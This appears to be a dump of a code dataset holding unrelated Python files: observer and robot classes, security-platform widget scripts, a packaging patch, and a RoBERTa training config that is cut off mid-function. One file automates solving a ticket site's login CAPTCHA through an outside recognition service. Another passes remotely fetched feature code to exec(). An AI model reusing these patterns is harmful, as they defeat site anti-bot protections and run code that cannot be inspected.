hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b6d66846dd1a4e3402cad6fd04c432f519bd5085
| 625 |
py
|
Python
|
quant/observers/observer.py
|
doubleDragon/QuantBot
|
53a1d6c62ecece47bf777da0c0754430b706b7fd
|
[
"MIT"
] | 7 |
2017-10-22T15:00:09.000Z
|
2019-09-19T11:45:43.000Z
|
quant/observers/observer.py
|
doubleDragon/QuantBot
|
53a1d6c62ecece47bf777da0c0754430b706b7fd
|
[
"MIT"
] | 1 |
2018-01-19T16:19:40.000Z
|
2018-01-19T16:19:40.000Z
|
quant/observers/observer.py
|
doubleDragon/QuantBot
|
53a1d6c62ecece47bf777da0c0754430b706b7fd
|
[
"MIT"
] | 5 |
2017-12-11T15:10:29.000Z
|
2018-12-21T17:40:58.000Z
|
import abc
class Observer(object, metaclass=abc.ABCMeta):
    """Abstract base class for market observers.

    Concrete observers are driven by an outer loop: they get depth updates
    via tick()/begin_opportunity_finder() and are notified of detected
    opportunities via opportunity(). terminate() flags the observer so the
    owning loop can shut it down.
    """
    # BUGFIX: the original set `__metaclass__ = abc.ABCMeta`, which is
    # Python 2 syntax and is silently ignored by Python 3; the `metaclass=`
    # keyword actually applies ABCMeta.

    def __init__(self):
        self.is_terminated = False

    def terminate(self):
        """Mark this observer as terminated."""
        self.is_terminated = True

    def update_balance(self):
        pass

    def update_other(self):
        pass

    def tick(self, depths):
        """Called on each refresh with the latest market depths."""
        pass

    def begin_opportunity_finder(self, depths):
        pass

    def end_opportunity_finder(self):
        pass

    # Abstract in intent only (see original "Abs function" note): not marked
    # @abc.abstractmethod so direct instantiation and partial subclasses
    # keep working.
    def opportunity(self, profit, volume, bprice, kask, sprice, kbid, perc, w_bprice, w_sprice,
                    base_currency="CNY", market_currency="BTC"):
        pass
| 19.53125 | 95 | 0.6192 |
edefcfed10ffc0c1828ff2bf3352ad064f80ade4
| 2,221 |
py
|
Python
|
Packs/CortexXDR/Scripts/CortexXDRAdditionalAlertInformationWidget/CortexXDRAdditionalAlertInformationWidget.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CortexXDR/Scripts/CortexXDRAdditionalAlertInformationWidget/CortexXDRAdditionalAlertInformationWidget.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CortexXDR/Scripts/CortexXDRAdditionalAlertInformationWidget/CortexXDRAdditionalAlertInformationWidget.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *
import traceback
''' COMMAND FUNCTION '''
def get_additonal_info() -> List[Dict]:
    """Collect display-ready fields from the XDR original alert(s) in context.

    Returns one dict per alert; 'Caller IP' values are converted to clickable
    indicator links. Raises DemistoException when the context key is missing.
    (The function name keeps the original 'additonal' typo because the
    caller references it by this name.)
    """
    alerts = demisto.get(demisto.context(), 'PaloAltoNetworksXDR.OriginalAlert')
    if not alerts:
        raise DemistoException('Original Alert is not configured in context')
    if not isinstance(alerts, list):
        alerts = [alerts]
    results = []
    for alert in alerts:
        # BUGFIX: alert.get('event') may be absent or None; fall back to an
        # empty dict so the field lookups below don't raise AttributeError.
        alert_event = alert.get('event') or {}
        res = {'Alert Full Description': alert.get('alert_full_description'),
               'Detection Module': alert.get('detection_modules'),
               'Vendor': alert_event.get('vendor'),
               'Provider': alert_event.get('cloud_provider'),
               'Log Name': alert_event.get('log_name'),
               'Event Type': demisto.get(alert_event, 'raw_log.eventType'),
               'Caller IP': alert_event.get('caller_ip'),
               'Caller IP Geo Location': alert_event.get('caller_ip_geolocation'),
               'Resource Type': alert_event.get('resource_type'),
               'Identity Name': alert_event.get('identity_name'),
               'Operation Name': alert_event.get('operation_name'),
               'Operation Status': alert_event.get('operation_status'),
               'User Agent': alert_event.get('user_agent')}
        results.append(res)
    # Replace raw caller IPs with their clickable-indicator form.
    indicators = [res.get('Caller IP') for res in results]
    indicators_callable = indicators_value_to_clickable(indicators)
    for res in results:
        res['Caller IP'] = indicators_callable.get(res.get('Caller IP'))
    return results
''' MAIN FUNCTION '''
def main():
    """Render the additional-alert-information table for the XDR widget."""
    try:
        results = get_additonal_info()
        table_headers = list(results[0].keys()) if results else None
        markdown = tableToMarkdown('Original Alert Additional Information', results,
                                   headers=table_headers)
        return_results(CommandResults(readable_output=markdown))
    except Exception as ex:
        # Log the full traceback server-side, then surface a short error.
        demisto.error(traceback.format_exc())
        return_error(f'Failed to execute AdditionalAlertInformationWidget. Error: {str(ex)}')
''' ENTRY POINT '''
# Runs under XSOAR's script runner; the module name differs across Python
# versions ('__builtin__' on Py2, 'builtins' on Py3), hence the tuple check.
if __name__ in ('__main__', '__builtin__', 'builtins'):
    main()
| 38.293103 | 98 | 0.633949 |
b697c60fa81218c8991539315a6c9b2990ef5f64
| 2,232 |
py
|
Python
|
VerifyCode.py
|
Fzzfbu2/AutoGetTicket
|
bdc8f460cf70ce770ecf9b49ec498a7756742e14
|
[
"Apache-2.0"
] | 1 |
2020-01-20T09:55:37.000Z
|
2020-01-20T09:55:37.000Z
|
VerifyCode.py
|
Fzzfbu2/AutoGetTicket
|
bdc8f460cf70ce770ecf9b49ec498a7756742e14
|
[
"Apache-2.0"
] | null | null | null |
VerifyCode.py
|
Fzzfbu2/AutoGetTicket
|
bdc8f460cf70ce770ecf9b49ec498a7756742e14
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import pyautogui
import pyperclip
import requests
import win32api
import win32con
from selenium.webdriver import ActionChains
class VerifyCode:
    """Solves the login image captcha.

    Flow: save the captcha image to disk via the browser's context menu
    (driven by OS-level key events and the clipboard), POST it to an external
    recognition service, then click the recognized cell positions on the
    captcha grid (two rows of four cells, 72 px apart).
    """
    def __init__(self, driver):
        # Selenium WebDriver currently showing the login page.
        self.driver = driver
        """ 目前这个接口时免费的。个人用没问题 """
        # (Note above: "this recognition API is currently free; fine for
        # personal use".)
        self.verify_url = "http://littlebigluo.qicp.net:47720/"
    def do_check(self):
        """ 保存图片到本地 """
        # ("Save the image locally"), then click the recognized cells.
        self.save_img()
        time.sleep(1)
        """ 选择验证码 """
        # ("Select the captcha answers.")
        self.move()
    def save_img(self):
        # Right-click the captcha element to open the browser context menu.
        ele = self.driver.find_element_by_class_name("loginImg")
        action = ActionChains(self.driver).move_to_element(ele)
        action.context_click(ele).perform()
        time.sleep(1)
        # Press 'v' ("按v"): the "save image as" accelerator in the context
        # menu -- this depends on the browser/OS menu layout, so it's fragile.
        win32api.keybd_event(86, 0, 0, 0)
        win32api.keybd_event(86, 0, win32con.KEYEVENTF_KEYUP, 0)
        time.sleep(1)
        """ 此文件路径要改成可配置,如果以后多用户,要考虑。 """
        # (Note above: "this file path should be made configurable,
        # especially if multiple users are supported later".)
        pic = "D:\\Developer\\Code\\mydemo\\mysite\\test.jpg"
        # Paste the target path into the native save dialog via the clipboard.
        pyperclip.copy(pic)
        time.sleep(1)
        pyautogui.hotkey("ctrlleft", "V")
        """ 回车前,先把这个目录下的图片清理 """
        # ("Before pressing Enter, remove any previous image at that path.")
        if os.path.exists(pic):
            os.remove(pic)
        time.sleep(1)
        pyautogui.press("enter")
    def upload_img(self):
        """ rb 以二进制方式读该文件 """
        # Upload the saved captcha ("rb" = read the file in binary mode).
        # NOTE(review): opens "test.jpg" relative to the CWD while save_img
        # writes an absolute path -- confirm both resolve to the same file.
        response = requests.post(self.verify_url, files={"pic_xxfile": open("test.jpg", "rb")})
        time.sleep(2)
        # The service answers with HTML; the positions sit between <B> tags.
        num = response.text.split("<B>")[1].split("<")[0]
        print('验证码识别成功!图片位置:%s' % num)
        try:
            # Single numeric position: return it as a one-element list.
            # NOTE(review): a response of "0" falls through both branches and
            # returns None -- verify the service never answers 0.
            if int(num):
                return [int(num)]
        except ValueError:
            # Several space-separated positions: parse them all.
            num = list(map(int, num.split()))
            return num
    def move(self):
        """ 调用接口上传返回结果 """
        # ("Call the API, upload, use the returned result.") Cells 1-4 are the
        # top row (y=73), 5-8 the bottom row (y=145), 72 px apart on x.
        num = self.upload_img()
        try:
            ele = self.driver.find_element_by_class_name('loginImg')
            for i in num:
                if i <= 4:
                    ActionChains(self.driver).move_to_element_with_offset(ele, 40 + 72 * (i - 1), 73).click().perform()
                else:
                    i -= 4
                    ActionChains(self.driver).move_to_element_with_offset(ele, 40 + 72 * (i - 1), 145).click().perform()
        except:
            # Bare except: any failure (stale element, bad response, num=None)
            # is only logged ("element not selectable").
            print('元素不可选!')
| 31.43662 | 121 | 0.533154 |
1e812ad4c4d03ecc9ecd40daf83896fd58ecb93e
| 1,007 |
py
|
Python
|
source/pkgsrc/devel/py-txgithub/patches/patch-txgithub_scripts_gist.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/py-txgithub/patches/patch-txgithub_scripts_gist.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/py-txgithub/patches/patch-txgithub_scripts_gist.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-txgithub_scripts_gist.py,v 1.2 2017/10/01 09:52:19 wiz Exp $
Fix for python-3.x.
https://github.com/tomprince/txgithub/issues/13
--- txgithub/scripts/gist.py.orig 2017-09-30 20:47:17.806190554 +0000
+++ txgithub/scripts/gist.py
@@ -30,16 +30,16 @@ def postGist(reactor, token, files):
gistFiles['gistfile1'] = {"content": sys.stdin.read()}
response = yield api.gists.create(files=gistFiles)
- print response['html_url']
+ print(response['html_url'])
def run(reactor, *argv):
config = Options()
try:
config.parseOptions(argv[1:]) # When given no argument, parses sys.argv[1:]
- except usage.UsageError, errortext:
- print '%s: %s' % (argv[0], errortext)
- print '%s: Try --help for usage details.' % (argv[0])
+ except usage.UsageError as errortext:
+ print('%s: %s' % (argv[0], errortext))
+ print('%s: Try --help for usage details.' % (argv[0]))
sys.exit(1)
return postGist(reactor, **config)
| 34.724138 | 84 | 0.6286 |
bf6168cb7acba96b551b6b3820dc17bea6066f1d
| 104 |
py
|
Python
|
insomniac/extra_features/action_dm.py
|
shifenis/Insomniac
|
7c9d572b83c29049bc3075073be5549fe821a739
|
[
"MIT"
] | 533 |
2020-06-01T10:40:11.000Z
|
2022-03-29T17:05:50.000Z
|
insomniac/extra_features/action_dm.py
|
shifenis/Insomniac
|
7c9d572b83c29049bc3075073be5549fe821a739
|
[
"MIT"
] | 399 |
2020-06-01T22:01:55.000Z
|
2022-03-29T20:39:29.000Z
|
insomniac/extra_features/action_dm.py
|
shifenis/Insomniac
|
7c9d572b83c29049bc3075073be5549fe821a739
|
[
"MIT"
] | 166 |
2020-06-01T21:51:52.000Z
|
2022-03-12T14:14:44.000Z
|
from insomniac import activation_controller
# NOTE(review): executes feature code fetched at runtime from the activation
# controller under the key 'action_dm'; the actual behavior lives outside
# this file, and exec() of remotely supplied code runs with full privileges.
exec(activation_controller.get_extra_feature('action_dm'))
| 26 | 58 | 0.875 |
44cf94c5fdf98f871538f11ac67edf71ae02d34a
| 7,480 |
py
|
Python
|
code/motor/robot.py
|
dieterpl/iDogstra
|
62ee246763e107335b9caf0a4f96239fa0953234
|
[
"MIT"
] | null | null | null |
code/motor/robot.py
|
dieterpl/iDogstra
|
62ee246763e107335b9caf0a4f96239fa0953234
|
[
"MIT"
] | null | null | null |
code/motor/robot.py
|
dieterpl/iDogstra
|
62ee246763e107335b9caf0a4f96239fa0953234
|
[
"MIT"
] | null | null | null |
import time
try:
import brickpi3
except Exception:
print("WARNING: no brickpi3 found (not running on raspberry pi?)")
brickpi3 = None
try:
import getch
except Exception:
print("WARNING: no getch found")
getch = None
import sys
if brickpi3 is not None:
    class Robot(brickpi3.BrickPi3):
        """Differential-drive robot on a BrickPi3, drive motors on ports A and D.

        Movement methods set raw motor power and remember the current
        direction/speed so that stop() can ramp the power down smoothly.
        """

        def __init__(self, speed=100):
            super(Robot, self).__init__()
            self.movement_state = 'stop'  # 'stop'|'forward'|'backward'|'left'|'right'
            self.default_speed = speed
            self.current_speed = 0

        def rotate(self, speed=None):
            """Rotate in place: speed < 0 turns left, > 0 turns right, 0 stops."""
            if speed is None:
                # BUGFIX: the original compared None < 0 (TypeError in
                # Python 3) when called without a speed; fall back to the
                # default speed like the other movement methods do.
                print('using default speed')
                speed = self.default_speed
            if speed < 0:
                self.left(speed * -1)
            elif speed > 0:
                self.right(speed)
            else:
                self.stop()

        def forward(self, speed=None):
            """Drive both motors forward at `speed` (default speed if None)."""
            if speed is None:
                print('using default speed')
                speed = self.default_speed
            self.set_motor_power(self.PORT_A + self.PORT_D, speed)
            self.current_speed = speed
            self.movement_state = 'forward'

        def backward(self, speed=None):
            """Drive both motors backward at `speed` (default speed if None)."""
            if speed is None:
                print('using default speed')
                speed = self.default_speed
            self.set_motor_power(self.PORT_A + self.PORT_D, -speed)
            self.current_speed = speed
            self.movement_state = 'backward'

        def left(self, speed=None):
            """Turn left in place: port A forward, port D backward."""
            if speed is None:
                print('using default speed')
                speed = self.default_speed
            self.set_motor_power(self.PORT_A, speed)
            self.set_motor_power(self.PORT_D, -speed)
            self.current_speed = speed
            self.movement_state = 'left'

        def right(self, speed=None):
            """Turn right in place: port A backward, port D forward."""
            if speed is None:
                print('using default speed')
                speed = self.default_speed
            self.set_motor_power(self.PORT_A, -speed)
            self.set_motor_power(self.PORT_D, speed)
            self.current_speed = speed
            self.movement_state = 'right'

        def stop(self):
            """Ramp current_speed down to 0 in unit steps (~10 ms each), then halt."""
            while self.current_speed > 0:
                self.current_speed -= 1
                if self.movement_state == 'forward':
                    self.forward(self.current_speed)
                elif self.movement_state == 'backward':
                    self.backward(self.current_speed)
                elif self.movement_state == 'left':
                    self.left(self.current_speed)
                elif self.movement_state == 'right':
                    self.right(self.current_speed)
                time.sleep(0.01)
            self.movement_state = 'stop'

        def __move_by_bpdegree(self, direction, bpdegree):
            """Rotate in place by `bpdegree` encoder degrees ('left' or 'right')."""
            # BUGFIX: the original used the module-level BP instance in this
            # method; use self so it works on the instance it is called on.
            # optional for setting rotation speed
            self.set_motor_limits(self.PORT_A + self.PORT_D, 50, 200)
            # reset motor positions
            self.offset_motor_encoder(self.PORT_A, self.get_motor_encoder(self.PORT_A))
            self.offset_motor_encoder(self.PORT_D, self.get_motor_encoder(self.PORT_D))
            port_A_pos = self.get_motor_encoder(self.PORT_A)
            port_D_pos = self.get_motor_encoder(self.PORT_D)
            port_A_new_pos = port_A_pos + bpdegree
            port_D_new_pos = port_D_pos + bpdegree
            print("curr portA: %s curr portD: %s" % (port_A_pos, port_D_pos))
            print("next portA: %s next portD: %s" % (port_A_new_pos, port_D_new_pos))
            if direction == 'left':
                self.set_motor_position(self.PORT_A, port_A_new_pos)
                self.set_motor_position(self.PORT_D, -port_D_new_pos)
                self.movement_state = 'left'
            elif direction == 'right':
                self.set_motor_position(self.PORT_A, -port_A_new_pos)
                self.set_motor_position(self.PORT_D, port_D_new_pos)
                self.movement_state = 'right'

        def move_by_degree(self, direction, degree):
            """Rotate by `degree` robot degrees; direction is the cli command name."""
            bpdegree = self.degree_to_bpdegree(degree)
            # BUGFIX: the original called self.move_by_bpdegree, which does
            # not exist (the helper's name is mangled as
            # _Robot__move_by_bpdegree); call the private helper directly.
            if direction == 'left_by_degree':
                self.__move_by_bpdegree('left', bpdegree)
            elif direction == 'right_by_degree':
                self.__move_by_bpdegree('right', bpdegree)

        def bpdegree_to_degree(self, bpdegree):
            """Convert motor encoder degrees to robot rotation degrees (~1/6)."""
            return (bpdegree * 1.66) / 10

        def degree_to_bpdegree(self, degree):
            """Convert robot rotation degrees to motor encoder degrees (x6)."""
            return (degree * 0.6) * 10

        def __move_for_duration(self, direction, duration, speed=None):
            """Move in `direction` at `speed` for `duration` seconds, then stop.

            BUGFIX: the original signature had no `direction` parameter (its
            body raised NameError) and recursively called itself with a bound
            method as the duration; it now dispatches to the matching
            movement method, matching how cli() already invoked it.
            """
            if speed is None:
                speed = self.default_speed
            moves = {'left': self.left, 'right': self.right,
                     'forward': self.forward, 'backward': self.backward}
            move = moves.get(direction)
            if move is not None:
                move(speed)
            time.sleep(duration)
            self.stop()

        def __move_with_key(self, key):
            """Map a WASD keypress to a movement; an empty read stops the robot."""
            if key == '' and self.movement_state != 'stop':
                self.stop()
            elif key == 'w':
                self.forward()
            elif key == 'a':
                self.left()
            elif key == 'd':
                self.right()
            elif key == 's':
                # 's' reverses when stopped, otherwise acts as a brake.
                if self.movement_state == 'stop':
                    self.backward()
                else:
                    self.stop()

        def drive_with_keys(self):
            """Poll getch and drive with WASD until Ctrl-C, then reset motors."""
            try:
                while True:
                    char = getch.getch()
                    self.__move_with_key(char)
                    time.sleep(0.01)
            except KeyboardInterrupt:
                self.reset_all()

        def cli(self):
            """Interactive command loop; see the module docstring for commands."""
            directions = ['left', 'right', 'forward', 'backward']
            directions_by_degree = ['left_by_degree', 'right_by_degree']
            try:
                while True:
                    left_motor = self.get_motor_encoder(self.PORT_A)
                    right_motor = self.get_motor_encoder(self.PORT_D)
                    print("Left motor: %6d - Right motor: %6d" % (left_motor, right_motor))
                    inp = input("> ")
                    operation = inp.split(' ')
                    command = operation[0]
                    if command in directions:
                        speed = int(operation[1])
                        duration = float(operation[2])
                        self.__move_for_duration(command, duration, speed)
                    elif command in directions_by_degree:
                        degree = int(operation[1])
                        self.move_by_degree(command, degree)
                    elif command == 'info':
                        # NOTE(review): get_info() is not defined on Robot and
                        # does not appear in this file -- this branch likely
                        # raises AttributeError; confirm against the brickpi3
                        # API before relying on it.
                        self.get_info()
                    else:
                        print('No such action')
            except KeyboardInterrupt:
                self.reset_all()
"""
call this module with > python3 robot.py speed to drive the
brickpi with WASD and a specific speed
otherwise > python3 robot.py will open the command line interface:
commands:
left speed duration
right speed duration
forward speed duration
backward speed duration
left_by_degree degree
right_by_degree degree
"""
if __name__ == '__main__':
    # With a speed argument: drive interactively with WASD keys at that speed.
    # Without arguments: start the command-line interface at speed 80.
    args = sys.argv
    if len(args) >= 2:
        speed = int(args[1])
        BP = Robot(speed)
        BP.drive_with_keys()
    else:
        speed = 80
        BP = Robot(speed)
        BP.cli()
| 32.951542 | 91 | 0.541176 |
787acf14f59696e8f16cf6760a73268d0a139e38
| 1,295 |
py
|
Python
|
Packs/MalwareInvestigationAndResponse/Scripts/InvestigationDetailedSummaryToTable/InvestigationDetailedSummaryToTable.py
|
jrauen/content
|
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
|
[
"MIT"
] | null | null | null |
Packs/MalwareInvestigationAndResponse/Scripts/InvestigationDetailedSummaryToTable/InvestigationDetailedSummaryToTable.py
|
jrauen/content
|
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
|
[
"MIT"
] | 40 |
2022-03-03T07:34:00.000Z
|
2022-03-31T07:38:35.000Z
|
Packs/MalwareInvestigationAndResponse/Scripts/InvestigationDetailedSummaryToTable/InvestigationDetailedSummaryToTable.py
|
jrauen/content
|
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
|
[
"MIT"
] | null | null | null |
from CommonServerPython import *
TACTIC = 'Tactic'
STATUS = 'Status'
BOOL_TO_DESCRIPTION = {True: '🔴 Detected', False: '🟢 Not Detected'}
def table_command(context: dict) -> CommandResults:
    """Render the parsed detailed-summary context as a markdown table.

    Each tactic becomes a bold header row followed by one row per technique
    with its detection status; an empty context yields a placeholder message.
    """
    if not context:
        placeholder = ('### Waiting on entries\n'
                       'When `InvestigationDetailedSummaryParse` is finished, its results will appear here.')
        return CommandResults(readable_output=placeholder)
    rows: list[dict] = []
    for tactic, techniques in context.items():
        rows.append({TACTIC: f'**{tactic.upper()}**', STATUS: ''})
        rows.extend(
            {TACTIC: technique, STATUS: BOOL_TO_DESCRIPTION[found]}
            for technique, found in techniques.items()
        )
    return CommandResults(readable_output=tableToMarkdown('', rows, headers=[TACTIC, STATUS]))
def main():
    """Read the incident's detailed-summary field and return it as a table."""
    try:
        custom_fields = demisto.incident().get('CustomFields', {})
        raw_summary = custom_fields.get('malwaredetailedinvestigationsummary') or '{}'
        return_results(table_command(json.loads(raw_summary)))
    except Exception as ex:
        # Log the full traceback server-side, then surface a short error.
        demisto.error(traceback.format_exc())
        return_error(f'Failed to execute InvestigationDetailedSummaryToTable. Error: {str(ex)}')
# Runs under XSOAR's script runner; the module name differs across Python
# versions ('__builtin__' on Py2, 'builtins' on Py3), hence the tuple check.
if __name__ in ('__main__', '__builtin__', 'builtins'):
    main()
| 37 | 113 | 0.664865 |
01e07ad8588df02b2b29517992a57bb9371ff315
| 10,984 |
py
|
Python
|
training.py
|
NiksMer/ManiBERT
|
00e726ccd3d1b465c614c72b0b79c5286d0e68b4
|
[
"MIT"
] | null | null | null |
training.py
|
NiksMer/ManiBERT
|
00e726ccd3d1b465c614c72b0b79c5286d0e68b4
|
[
"MIT"
] | null | null | null |
training.py
|
NiksMer/ManiBERT
|
00e726ccd3d1b465c614c72b0b79c5286d0e68b4
|
[
"MIT"
] | null | null | null |
# %%
# Setup
## Packages
import pandas as pd
import numpy as np
import torch
from transformers import RobertaForSequenceClassification, TrainingArguments, Trainer, RobertaTokenizer, RobertaConfig
from datasets import load_metric, load_dataset
from sklearn.metrics import precision_recall_fscore_support, accuracy_score, classification_report
from tqdm import tqdm
## Cuda
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
n_gpu = torch.cuda.device_count()
####### Model Config ############
## Modelname
model_to_use = "roberta-base"
trained_model_name = "ManiBERT_v2"
## Max Sequence Length
max_lengh_parameter = 512
## Anzahl Labels
label_count = 56
## Anzahl Epochs
if n_gpu > 1 :
epoch_count = 5
else:
epoch_count = 1
## Batch Size
if n_gpu > 1 :
batch_size = 16
else:
batch_size = 4
## warmup_steps
warmup_ratio_parameter = 0.05
## weight_decay
weight_decay_parameter = 0.1
## learning_rate
learning_rate_parameter = 5e-05
## Log file
log_name = '01_Report/log_manibert.json'
## Report
validatipon_report_name = '01_Report/validation_report_manibert.txt'
test_report_name = '01_Report/test_report_manibert.txt'
####### Data Config ############
## Train Data
train_data = "00_Data_intern/01_data/trainingsdaten_manibert_27022022.csv"
## Valid Data
valid_data = "00_Data_intern/01_data/validierungsdaten_manibert_27022022.csv"
## Test Data
test_data = "00_Data_intern/01_data/testdaten_manibert_27022022.csv"
## Delimeter
delimeter_char = ","
## Label Names
label_names = [
"Foreign Special Relationships: Positive",
"Foreign Special Relationships: Negative",
"Anti-Imperialism",
"Military: Positive",
"Military: Negative",
"Peace",
"Internationalism: Positive",
"European Community/Union or Latin America Integration: Positive",
"Internationalism: Negative",
"European Community/Union or Latin America Integration: Negative",
"Freedom and Human Rights",
"Democracy",
"Constitutionalism: Positive",
"Constitutionalism: Negative",
"Decentralisation: Positive",
"Centralisation: Positive",
"Governmental and Administrative Efficiency",
"Political Corruption",
"Political Authority",
"Free Market Economy",
"Incentives: Positive",
"Market Regulation",
"Economic Planning",
"Corporatism/ Mixed Economy",
"Protectionism: Positive",
"Protectionism: Negative",
"Economic Goals",
"Keynesian Demand Management",
"Economic Growth: Positive",
"Technology and Infrastructure: Positive",
"Controlled Economy",
"Nationalisation",
"Economic Orthodoxy",
"Marxist Analysis: Positive",
"Anti-Growth Economy and Sustainability",
"Environmental Protection",
"Culture: Positive",
"Equality: Positive",
"Welfare State Expansion",
"Welfare State Limitation",
"Education Expansion",
"Education Limitation",
"National Way of Life: Positive",
"National Way of Life: Negative",
"Traditional Morality: Positive",
"Traditional Morality: Negative",
"Law and Order",
"Civic Mindedness: Positive",
"Multiculturalism: Positive",
"Multiculturalism: Negative",
"Labour Groups: Positive",
"Labour Groups: Negative",
"Agriculture and Farmers",
"Middle Class and Professional Groups",
"Underprivileged Minority Groups",
"Non-economic Demographic Groups"
]
## Config Dicts
id2label_parameter = {
"0": "Foreign Special Relationships: Positive",
"1": "Foreign Special Relationships: Negative",
"2": "Anti-Imperialism",
"3": "Military: Positive",
"4": "Military: Negative",
"5": "Peace",
"6": "Internationalism: Positive",
"7": "European Community/Union or Latin America Integration: Positive",
"8": "Internationalism: Negative",
"9": "European Community/Union or Latin America Integration: Negative",
"10": "Freedom and Human Rights",
"11": "Democracy",
"12": "Constitutionalism: Positive",
"13": "Constitutionalism: Negative",
"14": "Decentralisation: Positive",
"15": "Centralisation: Positive",
"16": "Governmental and Administrative Efficiency",
"17": "Political Corruption",
"18": "Political Authority",
"19": "Free Market Economy",
"20": "Incentives: Positive",
"21": "Market Regulation",
"22": "Economic Planning",
"23": "Corporatism/ Mixed Economy",
"24": "Protectionism: Positive",
"25": "Protectionism: Negative",
"26": "Economic Goals",
"27": "Keynesian Demand Management",
"28": "Economic Growth: Positive",
"29": "Technology and Infrastructure: Positive",
"30": "Controlled Economy",
"31": "Nationalisation",
"32": "Economic Orthodoxy",
"33": "Marxist Analysis: Positive",
"34": "Anti-Growth Economy and Sustainability",
"35": "Environmental Protection",
"36": "Culture: Positive",
"37": "Equality: Positive",
"38": "Welfare State Expansion",
"39": "Welfare State Limitation",
"40": "Education Expansion",
"41": "Education Limitation",
"42": "National Way of Life: Positive",
"43": "National Way of Life: Negative",
"44": "Traditional Morality: Positive",
"45": "Traditional Morality: Negative",
"46": "Law and Order",
"47": "Civic Mindedness: Positive",
"48": "Multiculturalism: Positive",
"49": "Multiculturalism: Negative",
"50": "Labour Groups: Positive",
"51": "Labour Groups: Negative",
"52": "Agriculture and Farmers",
"53": "Middle Class and Professional Groups",
"54": "Underprivileged Minority Groups",
"55": "Non-economic Demographic Groups"
}
label2id_parameter = {
"Foreign Special Relationships: Positive": 0,
"Foreign Special Relationships: Negative": 1,
"Anti-Imperialism": 2,
"Military: Positive": 3,
"Military: Negative": 4,
"Peace": 5,
"Internationalism: Positive": 6,
"European Community/Union or Latin America Integration: Positive": 7,
"Internationalism: Negative": 8,
"European Community/Union or Latin America Integration: Negative": 9,
"Freedom and Human Rights": 10,
"Democracy": 11,
"Constitutionalism: Positive": 12,
"Constitutionalism: Negative": 13,
"Decentralisation: Positive": 14,
"Centralisation: Positive": 15,
"Governmental and Administrative Efficiency": 16,
"Political Corruption": 17,
"Political Authority": 18,
"Free Market Economy": 19,
"Incentives: Positive": 20,
"Market Regulation": 21,
"Economic Planning": 22,
"Corporatism/ Mixed Economy": 23,
"Protectionism: Positive": 24,
"Protectionism: Negative": 25,
"Economic Goals": 26,
"Keynesian Demand Management": 27,
"Economic Growth: Positive": 28,
"Technology and Infrastructure: Positive": 29,
"Controlled Economy": 30,
"Nationalisation": 31,
"Economic Orthodoxy": 32,
"Marxist Analysis: Positive": 33,
"Anti-Growth Economy and Sustainability": 34,
"Environmental Protection": 35,
"Culture: Positive": 36,
"Equality: Positive": 37,
"Welfare State Expansion": 38,
"Welfare State Limitation": 39,
"Education Expansion": 40,
"Education Limitation": 41,
"National Way of Life: Positive": 42,
"National Way of Life: Negative": 43,
"Traditional Morality: Positive": 44,
"Traditional Morality: Negative": 45,
"Law and Order": 46,
"Civic Mindedness: Positive": 47,
"Multiculturalism: Positive": 48,
"Multiculturalism: Negative": 49,
"Labour Groups: Positive": 50,
"Labour Groups: Negative": 51,
"Agriculture and Farmers": 52,
"Middle Class and Professional Groups": 53,
"Underprivileged Minority Groups": 54,
"Non-economic Demographic Groups": 55
}
####### Functions ############
def tokenize_function(examples):
    """Tokenize the 'text' column of a dataset batch, padding and truncating
    to the model's maximum length (uses the module-level `tokenizer`)."""
    return tokenizer(examples["text"], padding="max_length", truncation=True)
## Neue Metrics function: https://huggingface.co/transformers/v3.0.2/training.html#trainer
def compute_metrics(pred):
    """Compute accuracy, micro/macro/weighted F1, and micro precision/recall.

    `pred` carries the evaluation batch: `pred.label_ids` holds the gold
    labels and `pred.predictions` the raw logits, argmax-ed over the last
    axis to obtain class predictions.
    """
    labels = pred.label_ids
    preds = pred.predictions.argmax(-1)
